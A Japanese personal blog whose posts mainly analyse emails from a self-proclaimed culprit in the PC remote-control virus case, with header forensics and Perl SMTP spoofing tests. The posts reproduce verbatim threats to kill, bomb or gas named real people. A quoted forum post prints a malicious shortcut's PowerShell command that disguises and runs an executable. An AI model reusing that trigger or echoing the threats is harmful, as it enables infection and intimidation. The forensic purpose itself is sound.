Hatena::ブログ(Diary)

satoru.netの自由帳 このページをアンテナに追加 RSSフィード

160513Friday

red5のログを日本時間で出力する(centOS/海外サーバ)

海外サーバcentOS時にred5を使うと、ログの日時がずれる。

sudo cp -p  /usr/share/zoneinfo/Japan /etc/localtime

をしても効かない。サーバ再起動してもだめ。

/etc/timezoneを設置したら反映された。

$ echo "Asia/Tokyo" > /etc/timezone

javaは/etc/timezoneを優先的に参照するようだ

参考リンク

http://lab.synergy-marketing.co.jp/blog/programming/timezone-on-java

140601Sunday

[]【安部銃蔵】真犯人の名乗る人物からのまたメール(全文+ヘッダー)

本日、2014年6月1日00:00:30、遠隔操作の「真犯人」と名乗る人物からまたメールが届いた。

※便乗犯、摸倣犯の可能性もあるので、取り扱い要注意。

ヘッダー情報付き(メールのソース)

全文

@タイトル

安倍晋三の心臓に弾丸ぶち込んで自民党本部にロケット砲を撃ち込む自民党員と

アグネスのPCに児ポぶち込む札幌ガスボンベ大爆破霞ヶ関あぼーん唐沢貴洋あ

ぼーん西村博之あぼーん

@日付:

2014年6月1日 00:00:30

@From:

安部銃蔵 <onigoroshijuzo11111011110@yahoo.co.jp>

@To:

省略。前回の真犯人からのメールと同じあて先(25名)。メールの順番も同じ。

@本文

毎度忘れた頃に現れる真犯人でーす

といってこの事件が忘れられた頃にでも現れようかと思っていたのですが

これ以上片山さんを苦しめるのはさすがに気の毒なので特別にお知らせします。

今回片山さんに自作自演を指示し無実を一転させるよう仕向けたのはこの私です。

あらかじめ片山さんのプライバシー情報をゲットしていたので、従わなければ今まで入手したプライバシー情報を全て拡散するなどと言って脅しました。

連絡先や行動パターン等々も把握するのは容易いことでした。

片山氏が保釈後に尾行されているということも当然わかっていたので、これも利用されてもらいました。

あえて見晴らしの良い場所を彼自身に選択させました。彼は河川敷を選んだようですが、なかなかグッドなチョイスでした。

今回のために彼にスマホやPCをこっそり用意させ、onigoroshijuzo2014アカウントを発行させ私が作成した文章をコピペさせて公判中の時間にでもタイマーで送信するようにさせました。

その後は適当に逃げて捕まったら自分が真犯人かのように振る舞い無実を一転させ有罪、というシナリオです。

片山さんが自殺を試みたとの報道がありましたが、生きていてくれてよかったです。

せっかく用意したゲームでプレイヤーに死なれてゲームオーバーになったんじゃ話にならないので。

■どうやって指示したのか?

まず代行者に専用のURLのみ伝えさせました。片山さんに直接渡したのかどうしたかは知りません。監視者等考慮する必要があったので

手段タイミング等は代行者にお任せです

あ。代行者というのは私の共犯というわけではなく、そういう代行業者さんです。

指示内容とメール文はネット上に載せておきました。当然ですが既に削除済みです。

指示文は保存禁止にし、メール用の文章のみ彼の端末にコピペさせました。

ちなみにURLは記憶に残りにくいものにしたのでまず覚えていないでしょう。もちろん海外のサーバです。

痕跡が残っているはずはありませんが、でもまあ頑張っていろいろ解析してみてください。何か手がかりが掴めるかもしれませんよ^^

片山氏や代行者へはいずれもこちらからの一方的(一方通行)な指示でしたので連絡を取り合うという形はとっていません。

やるかやらないかもあくまで片山氏自身の判断です。でもまあ弱みを握られてるんじゃ流石にせざるを得ませんよね(笑)

■その他

思っていたより順調だったので満足です。やはり高学歴さんはものわかりがいいですね。とても助かりました。

記念すべき5人目ということで人間遠隔操作の特別サプライズです。楽しんでいただけましたか?

今回片山さんはよく頑張ってくれました。

片山さん、佐藤弁護士江川さん、その他片山さんを支えてきた方々ご苦労様でした。大変素晴らしいご活躍でした。

それにしても世間の皆さんひどい手のひらの返しようでしたねぇ。まったくヒドイ世の中ですねー

この遠隔操作事件というゲームは5人目で締めくくろうと思っていますが、今後、警察・検察の行いによってはまた新たな被害者が出るかもしれないのでくれぐれも注意してくださいね。

あ。今回この件について一番面白い報道をしてくれたテレビ局には、ご褒美に特製花火をプレゼントしてあげましょう

■おまけ

この前、2ちゃんねるにウイルスを貼ったら踏み台がたくさん集まりました。

なのでまたいつでもゲームを始めることも可能です。

ヒント:poverty1398836253

■最後に

もし以上の事を刑務所に入る前に少しでも話してしまったら、片山さんのプライバシー情報全て流出させるように脅してあります。

でももういいです。終わりです。早く片山さんに伝えて楽にしてあげてください。

メールのデータ

PDF

http://yokoku.in/enkaku2012/abejuzo_140601.pdf

@TXT

http://yokoku.in/enkaku2012/abejuzo_140601.txt

@ヘッダー情報付き(メールのソース)

http://yokoku.in/enkaku2012/abejuzo_140601_source.txt

発信元情報など。

メーラー

YahooMailClassic/6.0.18 YahooMailWebService/0.8.111_53

Yahoo!のWebメーラーから送信している。(SMTPではない)

@送信日時

Sun, 01 Jun 2014 00:00:30 JST

ソース

Received: from [192.227.170.19] by web101405.mail.kks.yahoo.co.jp via HTTP; Sun, 01 Jun 2014 00:00:30 JST

X-Mailer: YahooMailClassic/6.0.18 YahooMailWebService/0.8.111_53

X-YMail-JAS: derF9KEVM1lathZJ7nDhFxBOU5DhzIbbOEyyzIRhW6eBav4OFWjzLqt7I_4d_ui6ANFJpfECtwqG4_EgQXOMpdjktjsK37qpUHQaLzApLmFh.PL54LTs8PHfHvCX82tcGSh4

Date: Sun, 1 Jun 2014 00:00:30 +0900 (JST)

@発信IP

192.227.170.19

現時点(2014/6/1)のtor statusによると、torIPの模様。

このIPルーター情報 (192.227.170.19)によるとアメリカtor exitのようだ。

※いずれも2014/06/1 4:30時点のもの

簡単な考察

矛盾点など

その後は適当に逃げて捕まったら自分が真犯人かのように振る舞い無実を一転させ有罪、というシナリオです。

  • 現実には片山氏は「適当に逃げて」おらず、自殺未遂後、自ら弁護士に連絡をした。警察も行動把握していなかった。

片山さんが自殺を試みたとの報道がありましたが、生きていてくれてよかったです。

せっかく用意したゲームでプレイヤーに死なれてゲームオーバーになったんじゃ話にならないので。

  • 「真犯人」の指示で、自作自演で無実を一転させるよう仕向けだけなら、片山氏の自殺未遂の動機は?

メモ

便乗犯、愉快犯
  • メールのあて先さえ入手できれば、第三者でも実現可能。
真犯人・協力者説
  • 従来の「真犯人」メールと時間帯(深夜&土日)の傾向、torを利用している点などは一致。
  • 遠隔操作事件の秘密の暴露などが一切ない為、100%「真犯人」だと確定できない。
片山氏による仕込み、自作自演
  • 片山氏が失踪中に河川敷での行動の言い逃れの為にこのシナリオを考えて、タイマーをセットしてから収監された?
  • Yahoo!Webメールtorを経由して自動送信する事は技術的に可能かどうかの検証が必要。(bot対策などで文字認証などが出てしまう可能性など)
  • 今回のメールの内容には失踪時点で判明している情報だけなので、失踪中に作成する事は実現可能。
  • 河川敷でのタイマー送信、捜査員の追跡、収監、今回のメールまで含めてすべて計画の一環だった?前回のタイマーでの逮捕はこれまでの慎重な真犯人と比較して、あまりにもずさんすぎて納得がいかない。との見方もあった。


関連リンク

真犯人がヒントで示しているスレッド

■おまけ

この前、2ちゃんねるにウイルスを貼ったら踏み台がたくさん集まりました。

なのでまたいつでもゲームを始めることも可能です。

ヒント:poverty1398836253



ウイルスについての指摘(?)と思われる投稿

http://fox.2ch.net/test/read.cgi/poverty/1398876571/35

35 :番組の途中ですがアフィサイトへの転載は禁止です:2014/05/01(木) 02:00:00.83 ID:3I146ai20

>>22

まとめ

rarの中身

 desktop.ini: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit, UPX compressed

 mov.lnk: MS Windows shortcut

 thumbs.db: Macromedia Flash Video

 mov.lnkの内容というかプロパティ

 C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe md 'mov' ;del 'mov.lnk' ;saps mov ;mv thumbs.db mov\mov.flv;sp mov\mov.flv attributes Archive;mv 'desktop.ini' '%temp%\x.exe';saps '%temp%\x.exe';

トラップのシナリオ

 ・解凍したらファイルが3つでてくる。

 ・そのうち「mov」と名前が付いてる、「フォルダのアイコン」をしたショートカットトリガー

 ・こいつをダブルクリックとか「開く」とかやると

   ・desktop.ini を、c:\temp\x.exe という名前にリネーム移動

   ・そいつを実行

アウトとセーフ

 ・解凍しただけならセーフ

 ・というか、mov ショートカットに触ってなければ問題ない

 ・ショートカットダブルクリックとか「開く」とかしたらアウト、シングルクリックは多分大丈夫

 ・XPならそもそも↓こんなものは存在しないのでセーフ。vista/7/8は知らん

   C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe

thumbs.db

 JCJSウェブカメラムービー。ニコ生かなんか?パンツも乳首もない、まあ普通の映像

http://fox.2ch.net/test/read.cgi/poverty/1398876571/529

529 :番組の途中ですがアフィサイトへの転載は禁止です:2014/05/01(木) 03:23:35.26 ID:o7sFdkS+0

トレースしてみたが

これ想像以上にかなり悪質かも知れん。

まず、どっかと通信してるんだけど、

これがおそらく実行ファイル置き場。

今は何も置いてないみたいだから特に害はないが

この置き場に実行ファイルが置かれたら

勝手にPCにダウンロードして勝手に実行するようになってる模様。

さらにレジストリにも同時に書き込みをしており、

手動で消したところで「実行ファイルが消されたら新しい実行ファイルを生成」という

命令が出され、しかもファイル名を変えて実行ファイルが作成される。

vmcサキュラバス関数をいじっており、

相当高難度なプログラムとなってる。

もっと分かりやすく箇条書きすると、

仝什澆里△蕕罎ウイルストフトでは探知出来ない

▲侫.ぅ訝屬場との通信を常に行っており、そこに悪質な実行ファイル置かれたらおしまい

手動で消したところですでに常駐&レジストリいじりをされており、無駄

とりあえず、これから先、「何かされる」可能性が高いので

「今特に何も起こってないからセーフ」とは考えてはいけない。

「何かされる」のを防ぐ方法はある。PCの通信を遮断すること。

これなら現状のウイルスが常駐してようと、「成長」することはない。

情報はスマホやサブのノートPCなどで収集するといい。


記事など

遠隔操作ウイルス事件「真犯人」メールが再び届く 「早く片山さんに伝えて楽にしてあげてください」

2ちゃんねる現行スレ

嫌儲

140520Tueday

[] yahoo!SMTPでMessage-IDの指定時にメールのソースにどんな変化があるか検証

真犯人からのメールのMessage-IDに関しての検証。

Message-ID: <93dhqdjpt0hqgushhj9t34q1.1400142888062@email.android.com>


条件

  • 1.message-id無指定で送信
  • 2.message-idに『93dhqdjpt0hqgushhj9t34q1.1400142888062@email.android.com』と指定して送信

※いずれも、Yahoo!SMTP (plain認証)で送信する

実行プログラムソース

http://yokoku.in/enkaku2012/meessage-id-gisou/perl-source.txt

結果1:Message-IDを指定しなかった場合

Message-ID:なし

ヤフーのメールサーバでは、Message-IDをなにも指定していない場合は、

自動的にサーバ側で値が割り振られる。この場合は、メールサーバによるものなので偽装不可能。

http://yokoku.in/enkaku2012/meessage-id-gisou/mail1.txt

結果2:Message-IDを指定した場合

Message-ID:93dhqdjpt0hqgushhj9t34q1.1400142888062@email.android.com

任意のmessage-IDをつけてメールを送信した場合、

今回の真犯人からのメール同様、任意のIDがメールソース内に指定が可能。

http://yokoku.in/enkaku2012/meessage-id-gisou/mail2.txt

Message-IDが任意指定かどうかの判定方法

ただし、その場合、ヘッダーの位置が変化するので、

Message-IDの位置で、<サーバ側が割り振った値>か、<クライアントがつけた任意のID>かを判断できる。


(下位にある:クライアント指定によるもの=偽装可能、上位にある:メールサーバによる指定=偽装不可能)

結論

  • Yahoo!SMTPでmessage-IDを指定して送信した場合はクライアント側で任意のmessage-IDをメールソースに表示させる事が可能
  • 多くの場合、message-IDはメーラー側で自動的に付与される為、メーラー名などの固有文字が自動的に指定される。
  • 今回の真犯人のメールの @email.anforoid.com という指定も、メーラーが付与した可能性がある。
  • オリジナルのメーラーの場合は、今回のように Androidのメーラーを装って指定した時間に送信したかのようなmessage-idを指定できる
  • 今回の真犯人が残したmessage-idはクライアント指定によるものだが、なぜタイマー疑惑が疑われるような過去のタイムスタンプを入れてしまったのかは疑問。(オリジナルのメーラーであれば、送信時点の時刻を入れることも可能なため。)
    • たまたま使ったメーラーがメール作成時点の時刻を入れてしまうものだった?
    • 過去の時刻を入れることで片山氏をはめる目的だった?
    • そこまで頭がまわらなかった?

140519Monday

[] 『onigoroshijuzo2014@yahoo.co.jp』の偽装可能か検証

  • 真犯人はメールヘッダーの情報からYahoo!SMTPのplain認証を使っている事が判明している。
  • 河川敷を掘ってみつかったスマホには「真犯人を名乗るメールのアドレスの痕跡があった」との報道があった
  • SMTPは仕組み上、他人のメールアドレスを装って送信できる場合がある(メールサーバの対策次第)
  • 河川敷のスマホから配信されたメールアドレスは本当にそのスマホから配信されたものなのかどうか。
  • Yahoo!アカウントをひとつ用意して、SMTP認証後、他人のyahooアドレスを装って送信できるか試してみた。

ソース

http://yokoku.in/enkaku2012/gisyo_check_script.txt

検証

検証1:通常の送信

SMTP認証:正規のyahoo!アカウント、From:正規のメールアドレス

認証成功。送信も成功。問題なく配信。

到着したメールのソース

検証2:メールアドレスを偽装する

SMTP認証:正規のyahoo!アカウント、From:[onigoroshijuzo2014@yahoo.co.jp]を偽装


521 smtp.mail.yahoo.co.jp closing transmission channel. This email address must be verified first before you can use it for Sender/From field.

とエラーが出て配信できず。

結論

  • SenderとFromが一致しない場合、Yahoo!SMTPはエラーを返す。
  • Yahoo!SMTPは配信元のメールアドレスを偽装することは不可能

140516Friday

[]遠隔操作の真犯人(と名乗る)人物からのメールが今回も来てた件

よく見たらメールきてたー。本文に関しては既出ですが、真犯人らしき人物からのメール本文&ヘッダを公開します。

また、メールのヘッダー情報などを元に自分なりの分析をしてみました。

目次

※なお、警視庁合同捜査本部には全ての内容はすでに情報提供済みです。

※このブログで公開している、画像・記事はすべて自由に転載・引用してくださって構いません。(許可や報告も不要です)

※今回のメールの題名など犯行予告が含まれる文言について転載する場合は、固有名称などを伏せるなど取り扱い注意。

■『小保方銃蔵』からのメール本文&ヘッダー

※送付先のメールアドレスは伏せてます。

■過去のメールまとめ(ヘッダ+本文)

■送信元メールアドレス onigoroshijuzo2014@yahoo.co.jp。現在はすでに削除済み。

onigoroshijuzo2014アカウントは2014/5/16 22:43現在、すでに削除済みの模様。

(※『2014/5/15 22:43』と誤植していました。ご指摘により修正しました。)

http://profiles.yahoo.co.jp/onigoroshijuzo2014

※17:37頃はメールは生きていた?

ジャーナリストの江川さんが2014年5月16日 17:37に真犯人に質問メールを送ってるようだ。

通常、削除されていれば、エラーメールが帰ってくるので、

ツイートした時点でエラーメールが帰ってきてないなら、この時点ではまだ消えてなかった可能性もある。


■メールの送信先一覧は前回と全く同じ25名(※ただし情報は過去に流出した可能性あり)

前回の2013年1月1日〜2013年1月5日に送られたあて先とまったく同じあて先。

追加も削除もなし。全25名。

今のところ、受信を表明している人リスト

※この25名のあて先は、真犯人の使っていたヤフーアカウントが不正ログインしやすい状況にあった事から、

あて先以外の第三者にもすでに流出している可能性がある。

よって「あて先25名を知っている事」は「真犯人である証明」にはならない。

参考リンク:記者が遠隔操作真犯人アカウントに不正ログインしていた履歴が公開される


■メールの送信日時が今回は夜型じゃない点

今回のメールの日時は 2014年5月16日 11:37でかなりの朝方になっている。

従来の鬼殺し重蔵からのメールはいずれも、夜型だった。

片山氏の会見では「公判の時間に、犯人がわざとアリバイのために送ってくれたのか?」のような趣旨の事をいっている点も注目したい。


■メール送信元 mp76f1fa5d.ap.nuro.jp(118.241.250.93)。踏み台?新たな被害者?

メールヘッダーのReceived:を抜粋。

Received: from unknown (HELO ?100.64.5.244?) (118.241.250.93 with plain)
  by smtp501.mail.kks.yahoo.co.jp with SMTP; 16 May 2014 02:40:36 -0000
X-YMail-JAS: 4silEm4VM1kSFXt3dSl.ptLc3GwanD4qjE8i_wMNhhDttjamyjG0_FsQ3_RFGxUhcRDcTQVIf3HQglEVWFZcbcwL.KMIwR2JVGICrTBVnwLnAyVM7psVMpPQWtGcp1Rbww--

ホスト名は mp76f1fa5d.ap.nuro.jp

so-net系列のプロバイダ

http://www.nuro.jp/

inetnum: 118.240.0.0 - 118.241.255.255 
netname: So-net 
descr: So-net Corporation 
descr: 2-1-1, Osaki, Shinagawa-ku, Tokyo 141-6010, Japan 
country: JP 
admin-c: JNIC1-AP 
tech-c: JNIC1-AP 
status: ALLOCATED PORTABLE 

前回、前々回はtor IPからだった。

今回は日本のプロバイダである為、発信元の特定が可能。

真犯人による踏み台、遠隔操作された新たな被害者のIPの可能性はある。

※1/5のRecieved→tor29.anonymizer.ccc.de(77.244.254.229)

http://d.hatena.ne.jp/satoru_net/20130105/1357318665

※1/1のRecieved→63.141.201.75(63.141.201.75-63.141.201.75 Tor Exit Node)

http://d.hatena.ne.jp/satoru_net/20130101/1356985472

何らかの理由でtorIPが使われず、国内IPを経由した理由はなんだろう。?

■今回はWebMailじゃなく、SMTPから送信されている可能性

メールヘッダーをみると、今回のメールのみ「X-Mailer:YahooMailClassic」のヘッダーがない。

http://yokoku.in/enkaku2012/mail20140516.txt

つまり、従来はブラウザ上からヤフーアカウントログインしてWebメーラーからメールが送られていたが、

今回のみSMTPを使って外部のメーラーソフトや外部サーバから送信されている可能性がある。

そのほかにも、本文がbase64でエンコードされているなど、メールのソースレベルだと前回と異なる点が多い。

SMTPからの送信であれば、タイマーによる送信や、何らかの自動化された送信も実現可能

今回分
前回分
参考リンク

■検証:Yahoo!SMTPから送信してみると、今回のヘッダーにほぼ一致するものが作成できた

SMTPを使って外部サーバからメールを送ってみた。

(検証用の自身のYahoo!アカウントenkaku_debug_2014@yahoo.co.jpからyano@satoru.net宛に送信)

結果、今回の真犯人のメールのヘッダーとほぼ同じものが出来た。

(特徴:WebMailerにはついていない X-Yahoo-Newman-Property、X-Yahoo-Newman-Id等のヘッダーが自動的に付与される。)

今回は、何らかの理由でWebメールを使わず、SMTPで送信をしたのはほぼ確定。

なお、前回のものと比較すると、ソースがぜんぜん違う。

前回分
検証用の外部SMTPメーラーのソース

ちなみに作ったメーラーのソースはこんな感じ。(perlのメール送信プログラム。パスワードのみ伏せてます。)

enkaku_debug_2014@yahoo.co.jpというyahooのメールアドレスからyano@satoru.net宛にメールを送るプログラム

外部サーバプログラムを実行しさせすれば、いつでも送信ができるので、スケジュールによるタイマー送信や、

自動化された送信なども可能。smtp通信のプログラム自体もすごく単純なものなので、

smtp関連はウイルスなどで仕込まれてる事がよくある。


ちなみに、Webメーラーを自動化して送信する場合、場合によってはタイムアウトでパスワード入力の再認証を求められたり、

外部サーバから偽装ブラウザでプログラムなどから操作した場合、スパム対策などで、画像認証をもとめられる場合がある。

この場合、人為的な目視での対応が必要になり、送信に失敗してしまう可能性がある。

■検証:Recieved (118.241.250.93 with plain)の"plain"の意味

メール送信をする場合の認証方法には、POP Before SMTP、plain、Login CRAM-MD5等がある。

(それぞれの具体的な仕様はぐぐってみてね。)

今回のメールのSMTP認証は"plain"が使われていた。

"plain"はIDとパスワードをEncodeした値をメールサーバに渡す認証方法。

簡易的な認証なのでコードも短くて済むのが特徴。

実験的に実際にplain認証でメールを送るプログラムをperlで作ってみた。

ソース:http://yokoku.in/enkaku2012/smtp_plain_ver_perl.txt

届いたメールはこれ。

http://yokoku.in/enkaku2012/smtp_plain_ver_mail.txt

結果的に、真犯人のメールとほぼ同様のメールヘッダーが再現できた。




■検証:メールヘッダーのrecievedの謎のIP『HELO ?100.64.5.244?』について

http://yokoku.in/enkaku2012/mail20140516.txt

Received: from unknown (HELO ?100.64.5.244?) (118.241.250.93 with plain)

上記のログの意味は、

  • 発信元のIP "118.241.250.93"
  • SMTP認証方法は "plain方式"(他にPOP Before SMTP、plain、Login CRAM-MD5等がある)
  • 自身のドメイン(FQDN)を"?100.64.5.244?"と指定した

というログを読み取れる。

"118.241.250.93"のIPを逆引きすると、"mp76f1fa5d.ap.nuro.jp"になる。

この部分は、SMTPサーバに接続時にYahoo!側が付与するので、接続元IPは偽証はできない。

『(Helo ?100.64.5.244?)』の値は偽証できるのか検証

メールの送信時にHeloの部分はメールサーバとの通信時に自身のメールサーバのドメインを伝える手段で任意の文字列を指定できる。

たとえば、

my $smtp = Net::SMTP->new('smtp.mail.yahoo.co.jp', Port => 587, Hello=>"?100.64.5.244?", Debug=>1);|

と指定すると、今回の真犯人メールと同じ HELOになるメールヘッダーが実現できた。

ソース:(ResievedのHELO が ?100.64.5.244?)

HELOの指定を省略した場合は、サーバのhostsで設定している自身のホスト名が使用される。

ソース:(ResievedのHELO が localhost.localdomain)

ちなみに"100.64.5.244"のIPアメリカ・ロサンゼルスに所属するIPのようだ。

http://www.topwebhosts.org/whois/index.php?query=100.64.5.244

HELOの指定自体は任意のものなので、メールとの関連性は不明。

真犯人が指定し忘れた?Proxy通し忘れた?過去に指定していたtorのホスト?いろんな可能性はありそう。

HELOに指定されたIPにはどういう意図があったのか疑問が残る。

■追記■IP:100.64.5.244はISP Shared Address(プロバイダー共用)

今回のIP 100.64.5.244 は 127.0.0.1のような、プライベートIPに近いもので、

ISP Shared Address(100.64.0.0/10)と言われるサービスプロバイダが共用するグローバルIPのようだ。

(※読者さんから、ご指摘いただきましたので、追記しました。感謝)

■追記■

SMTP認証について、(with login)ではなく(with plain)にする検証も下記で行いました。

http://d.hatena.ne.jp/satoru_net/20140516/1400248579#webmail2_2

秘密の暴露の2番目「部落解放同盟」の内容は秘密の暴露になってない

理由は真犯人による1回目のメール(2012/10/10)にエキサイトのアカウント情報が報道で公開されていた。

結果、第三者でもエキサイトIDでログインすれば送信履歴等から知ることは可能だった。

参考:(記事でID&パスワードが公開されてた)

http://megalodon.jp/2013-0503-2006-48/www.iza.ne.jp/news/newsarticle/event/crime/602253/

事実として、当時、その報道アカウントからヒントを得た新聞記者が

真犯人のヤフーアカウント(※エキサイトではない)などにも不正ログインして広く報道されていた。

参考:http://d.hatena.ne.jp/satoru_net/20130412/1365773143

ヤフーに不正ログインされるくらいなので、ID&パスワードが公開されていたエキサイトにも同様の

不正ログインが行われていた可能性は十分にある。

参考リンク:記者が遠隔操作真犯人アカウントに不正ログインしていた履歴が公開される


よって、秘密の暴露2は不正ログインをした第三者でも知りえる状況にある為、

犯人しかしる由のない「秘密の暴露」としては成立しないと思われる。

アカウントの変化。今回は『onigoroshijuzo2014』

  • 2012 初回:onigoroshijuzo
  • 2013/1/1〜1/5:onigoroshijuzo2
  • 2014/5/15 今回onigoroshijuzo2014←いまここ

なお、来年版(?)のonigoroshijuzo2015は、現時点では未取得の模様。

※ちなみに、http://profiles.yahoo.co.jp/obokatajuzoというアカウントも存在する模様。

今回のメールとの関連性は不明。


■独特な「三点リーダー」が使われず、正常になった

従来の真犯人の特徴のひとつだった独特な三点リーダー「・・・(全角で3文字)」が、

今回のメールでは一般的な「…(全角一文字)」になっていた。

参考:遠隔操作真犯人の発言集

http://yokoku.in/enkaku2012/enkaku.txt

■件名長すぎ=205文字。何らかの暗号?メッセージ?

皇居にロケット砲を撃ち込んで明仁美智子を始末する地下鉄霞が関駅でサリン散布する大野勝則裁判官と唐沢貴洋弁護士と
狩魔冥検事を上九一色村製AK47で射殺する聖路加病院爆破するお茶の水小学校で小女子喰う悠仁を去勢して天皇制断絶江川
紹子の閉経マンkにVXガス注射してポアするドコモショップ稚内店に牛五十頭突っ込ます
Caroline Kennedy will be killed just like her father

205文字(小文字大文字を1文字とカウント)もある為、たいていのメーラーでは迷惑フィルターに引っかかりメールに分類される。

バイト数(全角を2byte、半角を1byteでカウント)だと351バイト。

何らかの暗号、メッセージが含まれている可能性もある?

コピペ&取り扱い注意。上記の文章は犯行予告が含まれており、掲示板などに転載すると犯行予告をしたとみなされて罪を問われる可能性があります。具体名称は伏せるなどの対策を各自行ってください。

■検証:件名の分断の癖からメーラーが特定できる可能性

http://yokoku.in/enkaku2012/mail20140516_header.txt

メールソースをみるとSubject部分が不自然(?)に分断されている。

Subject:
 =?UTF-8?B?55qH5bGF44Gr44Ot44Kx44OD44OI56Cy44KS5pKD44Gh?=
 =?UTF-8?B?6L6844KT44Gn5piO5LuB576O5pm65a2Q44KS5aeL5pyr44GZ44KL?=
 =?UTF-8?B?5Zyw5LiL6YmE6Zye44GM6Zai6aeF44Gn44K144Oq44Oz5pWj?=
 =?UTF-8?B?5biD44GZ44KL5aSn6YeO5Yud5YmH6KOB5Yik5a6Y44Go5ZSQ5rKi6LK0?=
 =?UTF-8?B?5rSL5byB6K235aOr44Go54up6a2U5Yal5qSc5LqL44KS?=
 =?UTF-8?B?5LiK5Lmd5LiA6Imy5p2R6KO9QUs0N+OBp+WwhOauuuOBmQ==?=
 =?UTF-8?B?44KL6IGW6Lev5Yqg55eF6Zmi54iG56C044GZ44KL44GK6Iy2?=
 =?UTF-8?B?44Gu5rC05bCP5a2m5qCh44Gn5bCP5aWz5a2Q5Zaw44GG5oKg5LuB44KS5Y67?=
 =?UTF-8?B?5Yui44GX44Gm5aSp55qH5Yi25pat57W25rGf5bed57S5?=
 =?UTF-8?B?5a2Q44Gu6ZaJ57WM44Oe44Oza+OBq1ZY44Ks44K55rOo?=
 =?UTF-8?B?5bCE44GX44Gm44Od44Ki44GZ44KL44OJ44Kz44Oi44K344On?=
 =?UTF-8?B?44OD44OX56ia5YaF5bqX44Gr54mb5LqU5Y2B6aCt56qB44Gj6L6844G+44GZ?=
 =?UTF-8?B?Q2Fyb2xpbmUgS2VubmVkeSB3aWxsIGJlIA==?=
 =?UTF-8?B?a2lsbGVkIGp1c3QgbGlrZSBoZXIgZmF0aGVyLg==?=

これはMIMEのEncoderによって、長い文字列は自動的に分断される仕組みによる影響だと思われる。

perlでの検証例。

perlでよく使われるMime::Base64では等間隔で分断されたり、一括で変換されるモジュールなどもある。

少なくともperlではいずれのパターンにも一致しなかったが、完全に一致するライブラリがわかれば、

真犯人が使ったと思われるメーラーを特定できる可能性がある。

暇があるひとは、得意な言語のライブラリ(特にC++あたりが有力候補)でデコードしてみてください。

参考までperlで試したプログラムのソースは下記に設置してます。

http://yokoku.in/enkaku2012/subject_kensho_perl_source.txt

■検証:件名は何かの暗号?件名を忠実にデコードする

件名の分断に何らかの意味があると仮定して、忠実に元の文字にデコードするとこうなる

※実際にはそれぞれの区切りに改行は入っていないので、改行はこちらで区切り事に付け加えたもの

 皇居にロケット砲を撃ち
 込んで明仁美智子を始末する
 地下鉄霞が関駅でサリン散
 布する大野勝則裁判官と唐沢貴
 洋弁護士と狩魔冥検事を
 上九一色村製AK47で射殺す
 る聖路加病院爆破するお茶
 の水小学校で小女子喰う悠仁を去
 勢して天皇制断絶江川紹
 子の閉経マンkにVXガス注
 射してポアするドコモショ
 ップ稚内店に牛五十頭突っ込ます
 Caroline Kennedy will be
 killed just like her father.

参考まで、これを再現したプログラムのソースは下記

http://yokoku.in/enkaku2012/subject_source.txt

■Message-ID:に[@email.android.com]の文字。Andoroid携帯から送信か?

今回のメールのヘッダー情報のMessage-IDに『email.android.com』という文言が含まれていた。

Message-ID: 93dhqdjpt0hqgushhj9t34q1.1400142888062@email.android.com

このMessage-idは任意で指定ができるので、偽装可能な情報だが、

ストレートにこの記述を解読すると、

『アンドロイド製のメーラーでMessage-IDに"@email.android.com"と付加する

メールクライアントから送信された。』という事が読み取れる。


■Message-IDにメール到着の前日[2014/05/15 17:34:48]のタイムスタンプらしき数値

Message-ID: 93dhqdjpt0hqgushhj9t34q1.1400142888062@email.android.com

『1400142888062』の数値はunixタイム値のミリ秒だと仮定して日時に戻すと

2014/05/15 17:34:48の日時を差している。

 perl -MPOSIX -e 'printf "%s", POSIX::strftime "%Y/%m/%d %H:%M:%S",localtime(1400142888062/1000)'
2014/05/15 17:34:48

何らかの意図をもってこの日時が指定された?メールサーバと日本時間の時差?

メールが届いた時間帯をタイムスタンプに戻すと

perl -MTime::Local -e 'printf "%s", timelocal(13,37,11,16,5-1,2014-1900)'
$ 1400207833

実際の受信日時とこのタイムスタンプとの時間差を求めると、

perl -e 'my$diff=(1400207833 - 1400142888);printf "[%02d:%02d:%02d]\n", ($diff/60/60,($diff/60%60),$diff%60%60) '
[18:02:25]

結果は、真犯人メール到着までの時間差は18:02:25の時間差が示されている。ということになる。

※ただし、あくまで、偽装可能な情報であり、過去に真犯人はExif情報偽装などもしているので、取り扱い要注意。

yahoo!SMTPでMessage-IDの偽装は可能かどうか?の検証

ヤフーのメールサーバでは、Message-IDをなにも指定していない場合は、

自動的にサーバ側で値が割り振られるようだ。

任意のmessage-IDをつけてメールを送信した場合、

今回のメール同様、任意のIDを付与させることができる。

上記の結果から、ヘッダーの位置で、サーバ側が割り振った値か、クライアントがつけたか判断できる。

『赤くて香ばしい』という独特な表現。メール以前に使ってるサイトは?

今回の真犯人の独特な表現『赤くて香ばしい』を真犯人のメール以前に使っているサイトがあるか?

『2014年5月15日より前』 『赤くて香ばしい』でgoogle検索

結果、下記サイトなどがヒットする。

(※この考察はコメ欄、および、嫌儲板の投稿を元に追記ました。情報提供ありがとうございました。)

件名に含まれる犯行予告、キーワードの考察

今回のメールの件名は205文字で構成され、9件の犯行予告に分類できる。

また、それぞれに含まれるキーワード、固有名詞の意味を考察した結果、

皇室関連、オウム真理教関連、遠隔操作事件関連、2chで有名・話題関連に分類できた。

下記が分類の図。

下記ではそれぞれのキーワードについての意味などを調査する。

皇居にロケット砲を撃ち込んで明仁美智子を始末する
地下鉄霞が関駅でサリン散布する
大野勝則裁判官と唐沢貴洋弁護士と狩魔冥検事を上九一色村製AK47で射殺する
聖路加病院爆破する
お茶の水小学校で小女子喰う
悠仁を去勢して天皇制断絶
江川紹子の閉経マンkにVXガス注射してポアする
ドコモショップ稚内店に牛五十頭突っ込ます
Caroline Kennedy will be killed just like her father
明仁
  • 日本の天皇。
美智子
  • 現在の天皇の皇后(正妻の事)。
大野勝則裁判官
  • PC遠隔操作事件担当している裁判長 ソース
唐沢貴洋弁護士
  • 実在する日本の弁護士。一部の2ちゃんねるの板等で頻繁に犯行予告をされる事で有名。
狩魔冥検事
  • 狩魔 冥(かるま めい)はカプコンのゲーム『逆転裁判』シリーズに登場する架空の人物。
上九一色村
  • 山梨県にあった村。オウム真理教事件の施設(サティアン)が過去にあった場所として有名。
AK47
  • 「1947年式カラシニコフ自動小銃」は、1949年にソビエト連邦軍が制式採用した歩兵用アサルトライフル
  • オウム真理教の兵器としては、AK-74(自動小銃)を購入・開発していたとされている。
聖路加病院
